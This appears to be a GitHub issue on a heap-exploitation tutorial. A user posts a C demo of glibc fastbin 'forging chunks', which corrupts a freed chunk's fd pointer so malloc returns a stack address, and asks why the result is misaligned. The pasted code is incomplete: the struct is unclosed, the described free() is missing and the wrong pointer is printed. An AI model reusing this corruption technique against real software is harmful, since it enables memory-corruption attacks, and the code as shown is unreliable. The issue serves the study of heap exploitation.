heap-exploitation copied to clipboard
forging chunk issues
Hi! I am trying "forging chunks" in a x64 machine, Ubuntu 18.04.2 LTS.
This is the code I am execution + some printf for debug.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv) {
struct forged_chunk {
size_t prev_size;
size_t size;
struct forged_chunk *fd;
struct forged_chunk *bck;
char buf[10]; // padding
// First grab a fast chunk
char *a = malloc(10); // 'a' points to 0x219c010
printf("a: %p\n", a);
// Create a forged chunk
struct forged_chunk chunk; // At address 0x7ffc6de96690
printf("chunk: %p\n", &chunk);
chunk.size = 0x20; // This size should fall in the same fastbin
char* data = (char *)&chunk.fd; // Data starts here for an allocated chunk
strcpy(data, "attacker's data");
printf("data %p\n", data);
// Put the fast chunk back into fastbin
// Modify 'fd' pointer of 'a' to point to our forged chunk
*((unsigned long long *)a) = (unsigned long long)&chunk;
// Remove 'a' from HEAD of fastbin
// Our forged chunk will now be at the HEAD of fastbin
char* aa = malloc(10); // Will return 0x219c010
printf("aa: %p\n", aa);
char* victim = malloc(10); // Points to 0x7ffc6de966a0
printf("victim: %p\n", &victim);
printf("%s\n", victim); // Prints "attacker's data" !!
return 0;
While this is the optput:
a: 0x5646ebdb2260
chunk: 0x7ffff376dff0
data 0x7ffff376e000
aa: 0x5646ebdb2260
victim: 0x7ffff376dfd0
But the victim address is not aligned as expected.
Do you have any idea?
I tried also __attribute__((packed));
to avoid padding. But I get same result
In the end of the day I figured out to run it in this way:
char* data = (char *)&chunk.fd-0x10; // Data starts here for an
stil, why? :D